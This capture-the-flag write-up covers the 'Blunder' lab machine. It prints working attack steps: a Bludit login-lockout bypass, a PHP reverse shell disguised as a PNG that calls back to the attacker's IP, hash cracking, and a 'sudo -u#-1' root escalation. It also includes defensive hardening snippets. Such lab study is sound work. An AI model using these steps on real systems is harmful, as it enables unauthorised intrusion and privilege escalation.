Blunder
Port Scan
u505@naos:~/HTB/Machines/Blunder$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.191
[sudo] password for u505:

Starting masscan 1.0.5 at 2021-01-07 18:37:33 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.191
u505@naos:~/HTB/Machines/Blunder$ nmap -sC -sV blunder
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-07 13:36 EST
Nmap scan report for blunder (10.10.10.191)
Host is up (0.037s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds
Web enumeration
Robots.txt
Nothing interesting.

u505@naos:~/HTB/Machines/Blunder$ curl http://blunder/robots.txt
User-agent: *
Allow: /
Dirsearch
u505@naos:~/HTB/Machines/Blunder$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,html,php,js" -f -t 100 -u http://blunder

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: txt, html, php, js | HTTP method: GET | Threads: 100 | Wordlist size: 27664

Error Log: /opt/utils/dirsearch/logs/errors-21-01-04_14-43-05.log

Target: http://blunder/

Output File: /opt/utils/dirsearch/reports/blunder/_21-01-04_14-43-05.txt

[14:43:05] Starting:
[14:43:06] 403 -  272B - /.hta.html
[14:43:06] 403 -  272B - /.hta.js
[14:43:06] 403 -  272B - /.hta.php
[14:43:06] 403 -  272B - /.hta/
[14:43:06] 403 -  272B - /.htpasswd.php
[14:43:06] 403 -  272B - /.htpasswd.txt
[14:43:06] 403 -  272B - /.htaccess.php
[14:43:06] 403 -  272B - /.htaccess.html
[14:43:06] 403 -  272B - /.htpasswd.html
[14:43:07] 403 -  272B - /.htaccess.js
[14:43:07] 403 -  272B - /.hta.txt
[14:43:07] 403 -  272B - /.htpasswd.js
[14:43:09] 200 -    7KB - /0
[14:43:12] 200 -    3KB - /about
[14:43:13] 301 -    0B  - /admin  ->  http://10.10.10.191/admin/
[14:43:13] 200 -    2KB - /admin/
[14:44:19] 403 -  272B - /icons/
[14:44:23] 200 -   30B  - /install.php
[14:44:31] 200 -    1KB - /LICENSE
[14:45:16] 200 -   22B  - /robots.txt
[14:45:22] 403 -  272B - /server-status
[14:45:22] 403 -  272B - /server-status/
[14:45:42] 200 -  118B  - /todo.txt

Task Completed
todo.txt
u505@naos:~/HTB/Machines/Blunder$ curl http://blunder/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
admin page
Shell access
u505@naos:~/HTB/Machines/Blunder$ searchsploit bludit
---------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ---------------------------------
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass            | php/webapps/48746.rb
Bludit - Directory Traversal Image File Upload (Metasploit)           | php/remote/47699.rb
Bludit 3.9.12 - Directory Traversal                                   | php/webapps/48568.py
Bludit 3.9.2 - Auth Bruteforce Bypass                                 | php/webapps/48942.py
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)          | php/webapps/49037.rb
Bludit 3.9.2 - Directory Traversal                                    | multiple/webapps/48701.txt
bludit Pages Editor 3.0.0 - Arbitrary File Upload                     | php/webapps/46060.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Two of these exploits are relevant here: the first is an authentication brute-force bypass, and the second allows uploading PHP files to the server. The second exploit requires valid credentials.
Brute force authentication (CVE-2019-17240)
Bludit has an anti-brute-force mechanism that blocks login attempts from an IP after 10 invalid logins, but it trusts the proxy-forwarded IP. If the X-Forwarded-For header is randomized on each request, every attempt appears to come from a new address and the lockout never triggers.

public function getUserIp()
{
    // The first two branches trust request headers that any client can set,
    // so the value the login lockout is keyed on is attacker-controlled.
    if (getenv('HTTP_X_FORWARDED_FOR')) {
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    } elseif (getenv('HTTP_CLIENT_IP')) {
        $ip = getenv('HTTP_CLIENT_IP');
    } else {
        $ip = getenv('REMOTE_ADDR');
    }
    return $ip;
}
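The trusted-header problem above is easy to reproduce in a few lines. The following Python is an added example, not Bludit's code: it contrasts a resolver that behaves like Bludit 3.9.2 with one that only honours X-Forwarded-For when the TCP peer is a known proxy (the 10.0.0.0/8 proxy range is an assumption), and counts how many failed logins from a single peer get processed under each resolver.

```python
import ipaddress
from collections import defaultdict

# Assumption: our reverse proxies live in this range; nothing else may set X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
MAX_ATTEMPTS = 10  # lockout threshold described on this page

def naive_client_ip(remote_addr, x_forwarded_for=None):
    """Bludit 3.9.2 behaviour: whatever X-Forwarded-For says is believed outright."""
    return x_forwarded_for if x_forwarded_for else remote_addr

def hardened_client_ip(remote_addr, x_forwarded_for=None):
    """Honour X-Forwarded-For only when the TCP peer is one of our proxies, then walk the
    hop list from the right and return the first address that is not a trusted proxy."""
    peer = ipaddress.ip_address(remote_addr)
    if not x_forwarded_for or not any(peer in net for net in TRUSTED_PROXIES):
        return remote_addr
    for hop in reversed([h.strip() for h in x_forwarded_for.split(",")]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr  # malformed header: fall back to the socket address
        if not any(addr in net for net in TRUSTED_PROXIES):
            return str(addr)
    return remote_addr  # every hop was one of our own proxies

class LoginThrottle:
    """Per-IP failed-login counter; which IP it keys on depends on the resolver."""

    def __init__(self, resolver):
        self.resolver = resolver
        self.failures = defaultdict(int)

    def attempt(self, remote_addr, x_forwarded_for, password_ok):
        """Return True if the attempt was processed, False if the source is locked out."""
        ip = self.resolver(remote_addr, x_forwarded_for)
        if self.failures[ip] >= MAX_ATTEMPTS:
            return False
        if not password_ok:
            self.failures[ip] += 1
        return True

def attempts_processed(resolver, n):
    """How many of n bad logins from one peer get processed when each request carries a
    different X-Forwarded-For value (constructed addresses from the 192.0.2.0/24 test range)."""
    throttle = LoginThrottle(resolver)
    return sum(throttle.attempt("203.0.113.7", f"192.0.2.{i % 250}", False) for i in range(n))
```

With the hardened resolver the counter is keyed on the real peer address, so the eleventh attempt is rejected no matter what the header says.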
u505@naos:~/HTB/Machines/Blunder$ searchsploit -m 48942
  Exploit: Bludit 3.9.2 - Auth Bruteforce Bypass
      URL: https://www.exploit-db.com/exploits/48942
     Path: /usr/share/exploitdb/exploits/php/webapps/48942.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Blunder/48942.py

First I tried with the user fergus and rockyou-50.txt, but I was unsuccessful. Using the words of the web page was easier.
u505@naos:~/HTB/Machines/Blunder$ cewl http://blunder > words
u505@naos:~/HTB/Machines/Blunder$ cat users.txt
fergus
u505@naos:~/HTB/Machines/Blunder$ python3 48942.py -l http://10.10.10.191/admin/login.php -u users.txt -p words
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX

[◓] Brute Force: Testing -> fergus:CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
[◥] Brute Force: Testing -> fergus:the
...
[◑] Brute Force: Testing -> fergus:best
[├] Brute Force: Testing -> fergus:fictional
[▝] Brute Force: Testing -> fergus:character
[◐] Brute Force: Testing -> fergus:RolandDeschain

[*] SUCCESS !!
[+] Use Credential -> fergus:RolandDeschain
Fatal Python error: _enter_buffered_busy: could not acquire lock for <_io.BufferedWriter name='<stdout>'> at interpreter shutdown, possibly due to daemon threads
Python runtime state: finalizing (tstate=0x25aa750)

Current thread 0x00007f02eb077740 (most recent call first):
<no Python frame>
Aborted
Reverse shell (CVE-2019-16113)
u505@naos:~/HTB/Machines/Blunder$ searchsploit -m 48701
  Exploit: Bludit 3.9.2 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/48701
     Path: /usr/share/exploitdb/exploits/multiple/webapps/48701.txt
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Blunder/48701.txt

The exploit consists of uploading a PHP file with an image extension, plus an .htaccess file that makes the server interpret that image extension as PHP.
u505@naos:~/HTB/Machines/Blunder$ head 48701.txt -n 17
# Title: Bludit 3.9.2 - Directory Traversal
# Author: James Green
# Date: 2020-07-20
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: 3.9.2
# Tested on: Linux Ubuntu 19.10 Eoan
# CVE: CVE-2019-16113
#
# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699

#### USAGE ####
# 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP
# 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir
# 3. Run the exploit
# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc
# 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png

u505@naos:~/HTB/Machines/Blunder$ sed -n '19,$ p' 48701.txt > exploit2.py
u505@naos:~/HTB/Machines/Blunder$ chmod +x exploit2.py
Prepare our reverse shell.
u505@naos:~/HTB/Machines/Blunder$ grep CHANGE u505.php
$ip = '10.10.14.12';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
Rename it as an image file.
u505@naos:~/HTB/Machines/Blunder$ cp u505.php evil.png
Generate the .htaccess file.
u505@naos:~/HTB/Machines/Blunder$ echo "RewriteEngine off" > .htaccess
u505@naos:~/HTB/Machines/Blunder$ echo "AddType application/x-httpd-php .png" >> .htaccess
Change the parameters inside the script.

u505@naos:~/HTB/Machines/Blunder$ grep ME exploit2.py
url = 'http://10.10.10.191' # CHANGE ME
username = 'fergus' # CHANGE ME
password = 'RolandDeschain' # CHANGE ME
payload = 'evil.png' # CREATE ME
payload2 = '.htaccess' # CREATE ME

Start our listener.

u505@naos:~/HTB/Machines/Blunder$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Upload the files.

u505@naos:~/HTB/Machines/Blunder$ python3 exploit2.py
cookie: cf9irqqhraiprjlee00gtdqi63
csrf_token: 4069559be8dac1facccaa033b4a578f45f31881c
Uploading payload: evil.png
Uploading payload: .htaccess
Request our "image".
u505@naos:~/HTB/Machines/Blunder$ curl http://10.10.10.191//bl-content/tmp/temp/evil.png
The reverse shell opens.
u505@naos:~/HTB/Machines/Blunder$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.191.
Ncat: Connection from 10.10.10.191:35060.
Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 20:36:21 up 59 min,  1 user,  load average: 0.00, 0.00, 0.19
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
shaun    :0       :0               19:37   ?xdm?   1:29   0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
User hugo password
After a long enumeration, there was no obvious way to pivot to another user. In the end I found a users file with a hash in the 3.10 version of Bludit.

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    }
}

In 3 seconds the rockyou file was exhausted.
u505@naos:~/HTB/Machines/Blunder$ echo "faca404fd5c0a31cf1897b823c695c85cffeb98d" > hash
u505@naos:~/HTB/Machines/Blunder$ hashcat -m 100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.1.1) starting...
...
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: SHA1
Hash.Target......: faca404fd5c0a31cf1897b823c695c85cffeb98d
Time.Started.....: Mon Jan  4 15:58:55 2021 (2 secs)
Time.Estimated...: Mon Jan  4 15:58:57 2021 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  7913.6 kH/s (5.62ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[303334323137383439] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 42c Util: 41% Core:1137MHz Mem:2505MHz Bus:16

Started: Mon Jan  4 15:58:54 2021
Stopped: Mon Jan  4 15:58:57 2021

I ran a second attempt with the rockyou file and the best64 rules.
u505@naos:~/HTB/Machines/Blunder$ hashcat -m 100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat (v6.1.1) starting...
...
faca404fd5c0a31cf1897b823c695c85cffeb98d:Password120

Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: faca404fd5c0a31cf1897b823c695c85cffeb98d
Time.Started.....: Mon Jan  4 16:02:46 2021 (0 secs)
Time.Estimated...: Mon Jan  4 16:02:46 2021 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   112.3 MH/s (7.17ms) @ Accel:128 Loops:38 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 7864320/1104517568 (0.71%)
Rejected.........: 0/7864320 (0.00%)
Restore.Point....: 81920/14344384 (0.57%)
Restore.Sub.#1...: Salt:0 Amplifier:0-38 Iteration:0-38
Candidates.#1....: janiece -> mone123
Hardware.Mon.#1..: Temp: 39c Util: 49% Core:1163MHz Mem:2505MHz Bus:16

Started: Mon Jan  4 16:02:46 2021
Stopped: Mon Jan  4 16:02:47 2021
u505@naos:~/HTB/Machines/Blunder$ hashcat -m 100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --show
faca404fd5c0a31cf1897b823c695c85cffeb98d:Password120
User flag
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su - hugo
su - hugo
Password120

hugo@blunder:~$ cat user.txt
cat user.txt
<USER_FLAG>
Root flag
Sudo rights
The user hugo has sudo rights.

hugo@blunder:~$ sudo -l
sudo -l
Password120
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

As expected, the user cannot sudo as root.
hugo@blunder:~$ sudo /bin/bash
sudo /bin/bash
Sorry, user hugo is not allowed to execute '/bin/bash' as root on blunder.
But he can pivot to user shaun.
hugo@blunder:~$ sudo -u shaun /bin/bash
sudo -u shaun /bin/bash
shaun@blunder:/home/hugo$ id
id
uid=1000(shaun) gid=1000(shaun) groups=1000(shaun),4(adm),24(cdrom),30(dip),46(plugdev),119(lpadmin),130(lxd),131(sambashare)
User shaun has more rights, but I didn't find a way to own the machine.
Sudo security bypass (CVE-2019-14287)
u505@naos:~/HTB/Machines/Blunder$ searchsploit sudo
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Priv | multiple/local/11651.sh
Apple Mac OSX - Sudo Password Bypass (Metasploit) | osx/local/27944.rb
Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege E | linux/local/33576.txt
ptrace - Sudo Token Privilege Escalation (Metasploit) | linux/local/47345.rb
RedStar 3.0 Desktop - Enable sudo Privilege Escalation | linux/local/35746.sh
Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privil | bsd/local/1087.c
Sudo 1.5/1.6 - Heap Corruption | linux/local/20901.c
Sudo 1.6.3 - Unclean Environment Variable Privilege Escala | linux/local/21227.sh
Sudo 1.6.8 - Information Disclosure | linux/local/24606.c
Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privile | linux/local/1310.txt
Sudo 1.6.9p18 - 'Defaults SetEnv' Local Privilege Escalati | multiple/local/7129.sh
Sudo 1.6.x - Environment Variable Handling Security Bypass | linux/local/27056.pl
Sudo 1.6.x - Environment Variable Handling Security Bypass | linux/local/27057.py
Sudo 1.6.x - Password Prompt Heap Overflow | linux/local/21420.c
sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE B | linux/local/25134.c
sudo 1.8.0 < 1.8.3p1 - Format String | linux/dos/18436.txt
Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorize | linux/local/37710.txt
Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Esca | linux/local/42183.c
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow | linux/local/48052.sh
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC) | linux/dos/47995.txt
sudo 1.8.27 - Security Bypass | linux/local/47502.py
Sudo Perl 1.6.x - Environment Variable Handling Security B | linux/local/26498.txt
sudo.bin - NLSPATH Privilege Escalation | linux/local/319.c
SudoEdit 1.6.8 - Local Change Permission | linux/local/470.c
ZPanel zsudo - Local Privilege Escalation (Metasploit) | linux/local/26451.rb
----------------------------------------------------------- ---------------------------------
----------------------------------------------------------- ---------------------------------
Shellcode Title | Path
----------------------------------------------------------- ---------------------------------
Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) | linux_x86/43463.nasm
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL | linux_x86/13331.c
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL | linux_x86/44507.c
----------------------------------------------------------- ---------------------------------
Papers: No Results
This exploit describes the exact same scenario: bypassing a rule that allows every user except root.

u505@naos:~/HTB/Machines/Blunder$ searchsploit -m 47502
  Exploit: sudo 1.8.27 - Security Bypass
      URL: https://www.exploit-db.com/exploits/47502
     Path: /usr/share/exploitdb/exploits/linux/local/47502.py
File Type: ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Blunder/47502.py

The installed version is older than 1.8.27.
hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
Sudo doesn't check that the specified user ID exists and executes the command with the arbitrary ID under its own privilege; -u#-1 is interpreted as UID 0, which is root's ID.

So running sudo with user -1 provides access as root, bypassing the "!root" restriction.
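A quick audit for this exposure, as an added example written for this page rather than taken from the exploit: it parses `sudo --version` and `sudo -l` output of the shape shown above and flags any "(ALL, !root)"-style rule on a sudo older than 1.8.28, the release that fixed CVE-2019-14287. The sample strings are constructed from the output on this page.

```python
import re

FIXED_VERSION = (1, 8, 28)  # CVE-2019-14287 was fixed in sudo 1.8.28

def parse_sudo_version(version_output):
    """Pull (major, minor, patch) out of `sudo --version` output such as
    'Sudo version 1.8.25p1'; the 'p' suffix is ignored because every 1.8.x
    release before 1.8.28 is affected regardless of its patch level."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(part) for part in m.groups())

def exclusion_rules(sudo_l_output):
    """Return the commands from `sudo -l` whose Runas list is 'ALL' minus some
    excluded users, e.g. '(ALL, !root) /bin/bash'. On a vulnerable sudo such a
    rule still lets -u#-1 run the command as UID 0, so each one is a finding."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = re.match(r"\s*\((?P<runas>[^)]*)\)\s*(?P<cmd>\S.*)", line)
        if not m:
            continue
        # Runas may be 'user' or 'user : group' lists; split on both separators.
        runas = [x.strip() for x in re.split(r"[,:]", m.group("runas"))]
        if "ALL" in runas and any(x.startswith("!") for x in runas):
            findings.append(m.group("cmd").strip())
    return findings

def exposed_to_cve_2019_14287(version_output, sudo_l_output):
    """True when the binary predates the fix and at least one exclusion rule exists.
    The mitigation is to upgrade and to list permitted Runas users explicitly
    instead of excluding root from ALL."""
    return parse_sudo_version(version_output) < FIXED_VERSION and bool(
        exclusion_rules(sudo_l_output)
    )

# Constructed samples, shaped like the output captured on this page.
SAMPLE_VERSION = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass
User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""
```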
hugo@blunder:~$ sudo -u#-1 /bin/bash
root@blunder:/home/hugo# whoami
root
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>
References
Daniel Simao 13:05, 7 January 2021 (EST)